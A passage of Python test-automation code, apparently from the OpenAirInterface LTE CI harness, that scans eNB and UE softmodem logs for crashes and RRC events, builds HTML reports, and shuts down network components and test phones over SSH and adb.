if res1 is not None and res2 is not None:
requested_option = int(res1.group('requested_option'))
applied_option = int(res2.group('applied_option'))
if requested_option == applied_option:
self.htmleNBFailureMsg += '<span class="glyphicon glyphicon-ok-circle"></span> Command line option(s) correctly applied <span class="glyphicon glyphicon-arrow-right"></span> ' + self.eNBOptions[int(self.eNB_instance)] + '\n\n'
else:
self.htmleNBFailureMsg += '<span class="glyphicon glyphicon-ban-circle"></span> Command line option(s) NOT applied <span class="glyphicon glyphicon-arrow-right"></span> ' + self.eNBOptions[int(self.eNB_instance)] + '\n\n'
result = re.search('Exiting OAI softmodem', str(line))
if result is not None:
exitSignalReceived = True
result = re.search('[Ss]egmentation [Ff]ault', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Cc]ore [dD]ump', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('./lte_build_oai/build/lte-softmodem', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Aa]ssertion', str(line))
if result is not None and not exitSignalReceived:
foundAssertion = True
result = re.search('LLL', str(line))
if result is not None and not exitSignalReceived:
foundRealTimeIssue = True
if foundAssertion and (msgLine < 3):
msgLine += 1
msgAssertion += str(line)
result = re.search('Setting function for RU', str(line))
if result is not None:
isRRU = True
if isRRU:
result = re.search('RU 0 is_slave=yes', str(line))
if result is not None:
isSlave = True
if isSlave:
result = re.search('Received RRU_frame_resynch command', str(line))
if result is not None:
slaveReceivesFrameResyncCmd = True
result = re.search('LTE_RRCConnectionSetupComplete from UE', str(line))
if result is not None:
rrcSetupComplete += 1
result = re.search('Generate LTE_RRCConnectionRelease|Generate RRCConnectionRelease', str(line))
if result is not None:
rrcReleaseRequest += 1
result = re.search('Generate LTE_RRCConnectionReconfiguration', str(line))
if result is not None:
rrcReconfigRequest += 1
result = re.search('LTE_RRCConnectionReconfigurationComplete from UE rnti', str(line))
if result is not None:
rrcReconfigComplete += 1
result = re.search('LTE_RRCConnectionReestablishmentRequest', str(line))
if result is not None:
rrcReestablishRequest += 1
result = re.search('LTE_RRCConnectionReestablishmentComplete', str(line))
if result is not None:
rrcReestablishComplete += 1
result = re.search('LTE_RRCConnectionReestablishmentReject', str(line))
if result is not None:
rrcReestablishReject += 1
result = re.search('CDRX configuration activated after RRC Connection', str(line))
if result is not None:
cdrxActivationMessageCount += 1
result = re.search('uci->stat', str(line))
if result is not None:
uciStatMsgCount += 1
result = re.search('PDCP.*Out of Resources.*reason', str(line))
if result is not None:
pdcpFailure += 1
result = re.search('ULSCH in error in round', str(line))
if result is not None:
ulschFailure += 1
result = re.search('BAD all_segments_received', str(line))
if result is not None:
rlcDiscardBuffer += 1
result = re.search('Canceled RA procedure for UE rnti', str(line))
if result is not None:
rachCanceledProcedure += 1
result = re.search('dropping, not enough RBs', str(line))
if result is not None:
dropNotEnoughRBs += 1
enb_log_file.close()
logging.debug(' File analysis completed')
if uciStatMsgCount > 0:
statMsg = 'eNB showed ' + str(uciStatMsgCount) + ' "uci->stat" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if pdcpFailure > 0:
statMsg = 'eNB showed ' + str(pdcpFailure) + ' "PDCP Out of Resources" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if ulschFailure > 0:
statMsg = 'eNB showed ' + str(ulschFailure) + ' "ULSCH in error in round" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if dropNotEnoughRBs > 0:
statMsg = 'eNB showed ' + str(dropNotEnoughRBs) + ' "dropping, not enough RBs" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if rrcSetupComplete > 0:
rrcMsg = 'eNB completed ' + str(rrcSetupComplete) + ' RRC Connection Setup(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReleaseRequest > 0:
rrcMsg = 'eNB requested ' + str(rrcReleaseRequest) + ' RRC Connection Release(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReconfigRequest > 0 or rrcReconfigComplete > 0:
rrcMsg = 'eNB requested ' + str(rrcReconfigRequest) + ' RRC Connection Reconfiguration(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReconfigComplete) + ' were completed'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReestablishRequest > 0 or rrcReestablishComplete > 0 or rrcReestablishReject > 0:
rrcMsg = 'eNB requested ' + str(rrcReestablishRequest) + ' RRC Connection Reestablishment(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReestablishComplete) + ' were completed'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReestablishReject) + ' were rejected'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if X2HO_inNbProcedures > 0:
rrcMsg = 'eNB completed ' + str(X2HO_inNbProcedures) + ' X2 Handover Connection procedure(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if X2HO_outNbProcedures > 0:
rrcMsg = 'eNB completed ' + str(X2HO_outNbProcedures) + ' X2 Handover Release procedure(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if self.eNBOptions[int(self.eNB_instance)] != '':
res1 = re.search('drx_Config_present prSetup', self.eNBOptions[int(self.eNB_instance)])
if res1 is not None:
if cdrxActivationMessageCount > 0:
rrcMsg = 'eNB activated the CDRX Configuration for ' + str(cdrxActivationMessageCount) + ' time(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
else:
rrcMsg = 'eNB did NOT ACTIVATE the CDRX Configuration'
logging.debug('\u001B[1;37;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rachCanceledProcedure > 0:
rachMsg = 'eNB cancelled ' + str(rachCanceledProcedure) + ' RA procedure(s)'
logging.debug('\u001B[1;30;43m ' + rachMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rachMsg + '\n'
if isRRU:
if isSlave:
if slaveReceivesFrameResyncCmd:
rruMsg = 'Slave RRU received the RRU_frame_resynch command from RAU'
logging.debug('\u001B[1;30;43m ' + rruMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rruMsg + '\n'
else:
rruMsg = 'Slave RRU DID NOT receive the RRU_frame_resynch command from RAU'
logging.debug('\u001B[1;37;41m ' + rruMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rruMsg + '\n'
self.prematureExit = True
return ENB_PROCESS_SLAVE_RRU_NOT_SYNCED
if foundSegFault:
logging.debug('\u001B[1;37;41m eNB ended with a Segmentation Fault! \u001B[0m')
return ENB_PROCESS_SEG_FAULT
if foundAssertion:
logging.debug('\u001B[1;37;41m eNB ended with an assertion! \u001B[0m')
self.htmleNBFailureMsg += msgAssertion
return ENB_PROCESS_ASSERTION
if foundRealTimeIssue:
logging.debug('\u001B[1;37;41m eNB faced real time issues! \u001B[0m')
self.htmleNBFailureMsg += 'eNB faced real time issues!\n'
#return ENB_PROCESS_REALTIME_ISSUE
if rlcDiscardBuffer > 0:
rlcMsg = 'eNB RLC discarded ' + str(rlcDiscardBuffer) + ' buffer(s)'
logging.debug('\u001B[1;37;41m ' + rlcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rlcMsg + '\n'
return ENB_PROCESS_REALTIME_ISSUE
return 0
def AnalyzeLogFile_UE(self, UElogFile):
if (not os.path.isfile('./' + UElogFile)):
return -1
ue_log_file = open('./' + UElogFile, 'r')
exitSignalReceived = False
foundAssertion = False
msgAssertion = ''
msgLine = 0
foundSegFault = False
foundRealTimeIssue = False
uciStatMsgCount = 0
pdcpDataReqFailedCount = 0
badDciCount = 0
rrcConnectionRecfgComplete = 0
no_cell_sync_found = False
mib_found = False
frequency_found = False
plmn_found = False
self.htmlUEFailureMsg = ''
for line in ue_log_file.readlines():
result = re.search('Exiting OAI softmodem', str(line))
if result is not None:
exitSignalReceived = True
result = re.search('System error|[Ss]egmentation [Ff]ault|======= Backtrace: =========|======= Memory map: ========', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Cc]ore [dD]ump', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('./lte-uesoftmodem', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Aa]ssertion', str(line))
if result is not None and not exitSignalReceived:
foundAssertion = True
result = re.search('LLL', str(line))
if result is not None and not exitSignalReceived:
foundRealTimeIssue = True
if foundAssertion and (msgLine < 3):
msgLine += 1
msgAssertion += str(line)
result = re.search('uci->stat', str(line))
if result is not None and not exitSignalReceived:
uciStatMsgCount += 1
result = re.search('PDCP data request failed', str(line))
if result is not None and not exitSignalReceived:
pdcpDataReqFailedCount += 1
result = re.search('bad DCI 1A', str(line))
if result is not None and not exitSignalReceived:
badDciCount += 1
result = re.search('Generating RRCConnectionReconfigurationComplete', str(line))
if result is not None:
rrcConnectionRecfgComplete += 1
# No cell synchronization found, abandoning
result = re.search('No cell synchronization found, abandoning', str(line))
if result is not None:
no_cell_sync_found = True
result = re.search("MIB Information => ([a-zA-Z]{1,10}), ([a-zA-Z]{1,10}), NidCell (?P<nidcell>\d{1,3}), N_RB_DL (?P<n_rb_dl>\d{1,3}), PHICH DURATION (?P<phich_duration>\d), PHICH RESOURCE (?P<phich_resource>.{1,4}), TX_ANT (?P<tx_ant>\d)", str(line))
if result is not None and (not mib_found):
try:
mibMsg = "MIB Information: " + result.group(1) + ', ' + result.group(2)
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " nidcell = " + result.group('nidcell')
self.htmlUEFailureMsg += mibMsg
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " n_rb_dl = " + result.group('n_rb_dl')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " phich_duration = " + result.group('phich_duration')
self.htmlUEFailureMsg += mibMsg
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " phich_resource = " + result.group('phich_resource')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " tx_ant = " + result.group('tx_ant')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mib_found = True
except Exception as e:
logging.error('\033[91m' + "MIB marker was not found" + '\033[0m')
result = re.search("Measured Carrier Frequency (?P<measured_carrier_frequency>\d{1,15}) Hz", str(line))
if result is not None and (not frequency_found):
try:
mibMsg = "Measured Carrier Frequency = " + result.group('measured_carrier_frequency') + ' Hz'
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
frequency_found = True
except Exception as e:
logging.error('\033[91m' + "Measured Carrier Frequency not found" + '\033[0m')
result = re.search("PLMN MCC (?P<mcc>\d{1,3}), MNC (?P<mnc>\d{1,3}), TAC", str(line))
if result is not None and (not plmn_found):
try:
mibMsg = 'PLMN MCC = ' + result.group('mcc') + ' MNC = ' + result.group('mnc')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
plmn_found = True
except Exception as e:
logging.error('\033[91m' + "PLMN not found" + '\033[0m')
result = re.search("Found (?P<operator>[\w,\s]{1,15}) \(name from internal table\)", str(line))
if result is not None:
try:
mibMsg = "The operator is: " + result.group('operator')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
except Exception as e:
logging.error('\033[91m' + "Operator name not found" + '\033[0m')
result = re.search("SIB5 InterFreqCarrierFreq element (.{1,4})/(.{1,4})", str(line))
if result is not None:
try:
mibMsg = "SIB5 InterFreqCarrierFreq element " + result.group(1) + '/' + result.group(2)
self.htmlUEFailureMsg += mibMsg + ' -> '
logging.debug('\033[94m' + mibMsg + '\033[0m')
except Exception as e:
logging.error('\033[91m' + "SIB5 InterFreqCarrierFreq element not found" + '\033[0m')
result = re.search("DL Carrier Frequency/ARFCN : (?P<carrier_frequency>\d{1,15}/\d{1,4})", str(line))
if result is not None:
try:
freq = result.group('carrier_frequency')
new_freq = re.sub('/[0-9]+','',freq)
float_freq = float(new_freq) / 1000000
self.htmlUEFailureMsg += 'DL Freq: ' + ('%.1f' % float_freq) + ' MHz'
logging.debug('\033[94m' + " DL Carrier Frequency is: " + freq + '\033[0m')
except Exception as e:
logging.error('\033[91m' + " DL Carrier Frequency not found" + '\033[0m')
result = re.search("AllowedMeasBandwidth : (?P<allowed_bandwidth>\d{1,7})", str(line))
if result is not None:
try:
prb = result.group('allowed_bandwidth')
self.htmlUEFailureMsg += ' -- PRB: ' + prb + '\n'
logging.debug('\033[94m' + " AllowedMeasBandwidth: " + prb + '\033[0m')
except Exception as e:
logging.error('\033[91m' + " AllowedMeasBandwidth not found" + '\033[0m')
ue_log_file.close()
if rrcConnectionRecfgComplete > 0:
statMsg = 'UE connected to eNB (' + str(rrcConnectionRecfgComplete) + ' RRCConnectionReconfigurationComplete message(s) generated)'
logging.debug('\033[94m' + statMsg + '\033[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if uciStatMsgCount > 0:
statMsg = 'UE showed ' + str(uciStatMsgCount) + ' "uci->stat" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if pdcpDataReqFailedCount > 0:
statMsg = 'UE showed ' + str(pdcpDataReqFailedCount) + ' "PDCP data request failed" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if badDciCount > 0:
statMsg = 'UE showed ' + str(badDciCount) + ' "bad DCI 1A" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if foundSegFault:
logging.debug('\u001B[1;37;41m UE ended with a Segmentation Fault! \u001B[0m')
return ENB_PROCESS_SEG_FAULT
if foundAssertion:
logging.debug('\u001B[1;30;43m UE showed an assertion! \u001B[0m')
self.htmlUEFailureMsg += 'UE showed an assertion!\n'
if not mib_found or not frequency_found:
return OAI_UE_PROCESS_ASSERTION
if foundRealTimeIssue:
logging.debug('\u001B[1;37;41m UE faced real time issues! \u001B[0m')
self.htmlUEFailureMsg += 'UE faced real time issues!\n'
#return ENB_PROCESS_REALTIME_ISSUE
if no_cell_sync_found and not mib_found:
logging.debug('\u001B[1;37;41m UE could not synchronize ! \u001B[0m')
self.htmlUEFailureMsg += 'UE could not synchronize!\n'
return OAI_UE_PROCESS_COULD_NOT_SYNC
return 0
def TerminateeNB(self):
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(lIpAddr, lUserName, lPassWord)
self.command('cd ' + lSourcePath + '/cmake_targets', '\$', 5)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + lPassWord + ' | sudo -S daemon --name=enb' + str(self.eNB_instance) + '_daemon --stop', '\$', 5)
self.command('echo ' + lPassWord + ' | sudo -S killall --signal SIGINT lte-softmodem || true', '\$', 5)
time.sleep(5)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + lPassWord + ' | sudo -S killall --signal SIGKILL lte-softmodem || true', '\$', 5)
time.sleep(2)
self.command('rm -f my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.close()
# If tracer options is on, stopping tshark on EPC side
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
logging.debug('\u001B[1m Stopping tshark \u001B[0m')
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL tshark', '\$', 5)
time.sleep(1)
if self.EPC_PcapFileName != '':
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 666 /tmp/' + self.EPC_PcapFileName, '\$', 5)
self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, '/tmp/' + self.EPC_PcapFileName, '.')
self.copyout(lIpAddr, lUserName, lPassWord, self.EPC_PcapFileName, lSourcePath + '/cmake_targets/.')
self.close()
logging.debug('\u001B[1m Replaying RAW record file\u001B[0m')
self.open(lIpAddr, lUserName, lPassWord)
self.command('cd ' + lSourcePath + '/common/utils/T/tracer/', '\$', 5)
enbLogFile = self.eNBLogFiles[int(self.eNB_instance)]
raw_record_file = enbLogFile.replace('.log', '_record.raw')
replay_log_file = enbLogFile.replace('.log', '_replay.log')
extracted_txt_file = enbLogFile.replace('.log', '_extracted_messages.txt')
extracted_log_file = enbLogFile.replace('.log', '_extracted_messages.log')
self.command('./extract_config -i ' + lSourcePath + '/cmake_targets/' + raw_record_file + ' > ' + lSourcePath + '/cmake_targets/' + extracted_txt_file, '\$', 5)
self.command('echo $USER; nohup ./replay -i ' + lSourcePath + '/cmake_targets/' + raw_record_file + ' > ' + lSourcePath + '/cmake_targets/' + replay_log_file + ' 2>&1 &', lUserName, 5)
self.command('./textlog -d ' + lSourcePath + '/cmake_targets/' + extracted_txt_file + ' -no-gui -ON -full > ' + lSourcePath + '/cmake_targets/' + extracted_log_file, '\$', 5)
self.close()
self.copyin(lIpAddr, lUserName, lPassWord, lSourcePath + '/cmake_targets/' + extracted_log_file, '.')
logging.debug('\u001B[1m Analyzing eNB replay logfile \u001B[0m')
logStatus = self.AnalyzeLogFile_eNB(extracted_log_file)
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.eNBLogFiles[int(self.eNB_instance)] = ''
else:
analyzeFile = False
if self.eNBLogFiles[int(self.eNB_instance)] != '':
analyzeFile = True
fileToAnalyze = self.eNBLogFiles[int(self.eNB_instance)]
self.eNBLogFiles[int(self.eNB_instance)] = ''
if analyzeFile:
copyin_res = self.copyin(lIpAddr, lUserName, lPassWord, lSourcePath + '/cmake_targets/' + fileToAnalyze, '.')
if (copyin_res == -1):
logging.debug('\u001B[1;37;41m Could not copy eNB logfile to analyze it! \u001B[0m')
self.htmleNBFailureMsg = 'Could not copy eNB logfile to analyze it!'
self.CreateHtmlTestRow('N/A', 'KO', ENB_PROCESS_NOLOGFILE_TO_ANALYZE)
return
if self.eNB_serverId != '0':
self.copyout(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, './' + fileToAnalyze, self.eNBSourceCodePath + '/cmake_targets/')
logging.debug('\u001B[1m Analyzing eNB logfile \u001B[0m ' + fileToAnalyze)
logStatus = self.AnalyzeLogFile_eNB(fileToAnalyze)
if (logStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', logStatus)
self.preamtureExit = True
return
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateHSS(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_hss oai_hss || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep hss | grep -v grep', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_hss oai_hss || true', '\$', 5)
else:
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S daemon --name=simulated_hss --stop', '\$', 5)
time.sleep(1)
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL hss_sim', '\$', 5)
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateMME(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_mme mme || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep mme | grep -v grep', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_mme mme || true', '\$', 5)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./stop_mme', '\$', 5)
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateSPGW(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_spgw spgw || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep spgw | grep -v grep', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_spgw spgw || true', '\$', 5)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./stop_xGw', '\$', 5)
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateFlexranCtrl(self):
if self.flexranCtrlInstalled == False or self.flexranCtrlStarted == False:
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('echo ' + self.EPCPassword + ' | sudo -S daemon --name=flexran_rtc_daemon --stop', '\$', 5)
time.sleep(1)
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL rt_controller', '\$', 5)
time.sleep(1)
self.close()
self.flexranCtrlStarted = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# back in airplane mode on (ie radio off)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
self.command('stdbuf -o0 adb -s ' + device_id + ' shell ps | grep --color=never iperf | grep -v grep', '\$', 5)
result = re.search('shell +(?P<pid>\d+)', str(self.ssh.before))
if result is not None:
pid_iperf = result.group('pid')
self.command('stdbuf -o0 adb -s ' + device_id + ' shell kill -KILL ' + pid_iperf, '\$', 5)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def TerminateUE(self):
terminate_ue_flag = True
self.GetAllUEDevices(terminate_ue_flag)
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target= SSH.TerminateUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateOAIUE(self):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
self.command('ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S daemon --name=ue' + str(self.UE_instance) + '_daemon --stop', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal SIGINT lte-uesoftmodem || true', '\$', 5)
time.sleep(5)
self.command('ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal SIGKILL lte-uesoftmodem || true', '\$', 5)
time.sleep(2)
self.command('rm -f my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
self.close()
result = re.search('ue_', str(self.UELogFile))
if result is not None:
copyin_res = self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/' + self.UELogFile, '.')
if (copyin_res == -1):
logging.debug('\u001B[1;37;41m Could not copy UE logfile to analyze it! \u001B[0m')
self.htmlUEFailureMsg = 'Could not copy UE logfile to analyze it!'
self.CreateHtmlTestRow('N/A', 'KO', OAI_UE_PROCESS_NOLOGFILE_TO_ANALYZE, 'UE')
self.UELogFile = ''
return
logging.debug('\u001B[1m Analyzing UE logfile \u001B[0m')
logStatus = self.AnalyzeLogFile_UE(self.UELogFile)
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
if result is not None:
ueAction = 'Sniffing'
else:
ueAction = 'Connection'
if (logStatus < 0):
logging.debug('\u001B[1m' + ueAction + ' Failed \u001B[0m')
self.htmlUEFailureMsg = '<b>' + ueAction + ' Failed</b>\n' + self.htmlUEFailureMsg
self.CreateHtmlTestRow('N/A', 'KO', logStatus, 'UE')
# In case of sniffing on commercial eNBs we have random results
# Not an error then
if (logStatus != OAI_UE_PROCESS_COULD_NOT_SYNC) or (ueAction != 'Sniffing'):
self.Initialize_OAI_UE_args = ''
self.AutoTerminateUEandeNB()
else:
logging.debug('\u001B[1m' + ueAction + ' Completed \u001B[0m')
self.htmlUEFailureMsg = '<b>' + ueAction + ' Completed</b>\n' + self.htmlUEFailureMsg
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.UELogFile = ''
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def AutoTerminateUEandeNB(self):
if (self.ADBIPAddress != 'none'):
self.testCase_id = 'AUTO-KILL-UE'
self.desc = 'Automatic Termination of UE'
self.ShowTestID()
self.TerminateUE()
if (self.Initialize_OAI_UE_args != ''):
self.testCase_id = 'AUTO-KILL-UE'
self.desc = 'Automatic Termination of UE'
self.ShowTestID()
self.TerminateOAIUE()
if (self.Initialize_eNB_args != ''):
self.testCase_id = 'AUTO-KILL-eNB'
self.desc = 'Automatic Termination of eNB'
self.ShowTestID()
self.eNB_instance = '0'
self.TerminateeNB()
self.prematureExit = True
def IdleSleep(self):
time.sleep(self.idle_sleep_time)
self.CreateHtmlTestRow(str(self.idle_sleep_time) + ' sec', 'OK', ALL_PROCESSES_OK)
def X2_Status(self, idx, fileName):
cmd = "curl --silent http://" + self.EPCIPAddress + ":9999/stats | jq '.' > " + fileName
message = cmd + '\n'
logging.debug(cmd)
subprocess.run(cmd, shell=True)
if idx == 0:
cmd = "jq '.mac_stats | length' " + fileName
strNbEnbs = subprocess.check_output(cmd, shell=True, universal_newlines=True)
self.x2NbENBs = int(strNbEnbs.strip())
cnt = 0
while cnt < self.x2NbENBs:
cmd = "jq '.mac_stats[" + str(cnt) + "].bs_id' " + fileName
bs_id = subprocess.check_output(cmd, shell=True, universal_newlines=True)
self.x2ENBBsIds[idx].append(bs_id.strip())
cmd = "jq '.mac_stats[" + str(cnt) + "].ue_mac_stats | length' " + fileName
stNbUEs = subprocess.check_output(cmd, shell=True, universal_newlines=True)
nbUEs = int(stNbUEs.strip())
ueIdx = 0
self.x2ENBConnectedUEs[idx].append([])
while ueIdx < nbUEs:
cmd = "jq '.mac_stats[" + str(cnt) + "].ue_mac_stats[" + str(ueIdx) + "].rnti' " + fileName
rnti = subprocess.check_output(cmd, shell=True, universal_newlines=True)
self.x2ENBConnectedUEs[idx][cnt].append(rnti.strip())
ueIdx += 1
cnt += 1
msg = "FlexRan Controller is connected to " + str(self.x2NbENBs) + " eNB(s)"
logging.debug(msg)
message += msg + '\n'
cnt = 0
while cnt < self.x2NbENBs:
msg = " -- eNB: " + str(self.x2ENBBsIds[idx][cnt]) + " is connected to " + str(len(self.x2ENBConnectedUEs[idx][cnt])) + " UE(s)"
logging.debug(msg)
message += msg + '\n'
ueIdx = 0
while ueIdx < len(self.x2ENBConnectedUEs[idx][cnt]):
msg = " -- UE rnti: " + str(self.x2ENBConnectedUEs[idx][cnt][ueIdx])
logging.debug(msg)
message += msg + '\n'
